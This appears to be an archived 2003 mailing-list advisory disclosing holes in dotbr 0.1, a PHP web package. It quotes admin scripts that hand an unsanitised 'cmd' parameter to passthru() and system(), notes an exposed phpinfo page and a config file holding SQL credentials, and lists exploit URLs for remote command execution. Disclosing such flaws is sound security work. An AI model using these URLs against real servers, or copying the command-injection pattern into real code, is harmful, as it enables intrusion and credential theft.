OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Frog Man (leseulfrog_at_hotmail.com)
Date: Sat Feb 15 2003 - 03:55:19 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Informations :
    같같같같같같같
    Website : http://dotbr.org
    Version : 0.1
    Problems :
    - phpinfo()
    - Informations disclosure
    - System commands execution

    PHP Code/Location :
    같같같같같같같같같
    foo.php3 :
    ---------------------
    <? phpinfo(); ?>
    ---------------------

    config.inc :
    - SQL password
    - SQL host
    - SQL username
    - SQL DB name

    admin/exec.php3 :
    ---------------------------------------
    <html>
    <body>
    <pre>
    <?
      if (!isset($sep)) {
        $sep = "_";
      }
      $cmd=str_replace($sep," ",$cmd);
      passthru($cmd,$ret);
      echo $ret;
    ?>
    </pre>
    </body>
    </html>
    ---------------------------------------

    admin/system.php3 :
    ---------------------------------------
    <html>
    <body>
    <pre>
    <?
      $cmd = str_replace("_"," ",$cmd);
      system($cmd,$result);
      echo "\n result == ". $result . "\n";
    ?>
    </pre>
    </body>
    </html>
    ---------------------------------------

    Exploits :
    같같같같같
    http://[target]/foo.php3
    http://[target]/config.inc
    http://[target]/admin/exec.php3?cmd=[COMMAND]
    http://[target]/admin/system.php3?cmd=[COMMAND]

    More Details :
    같같같같같같같
    In French :
    http://www.frog-man.org/tutos/5holes8.txt

    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools

    frog-mn
    http://www.phpsecure.org

    _________________________________________________________________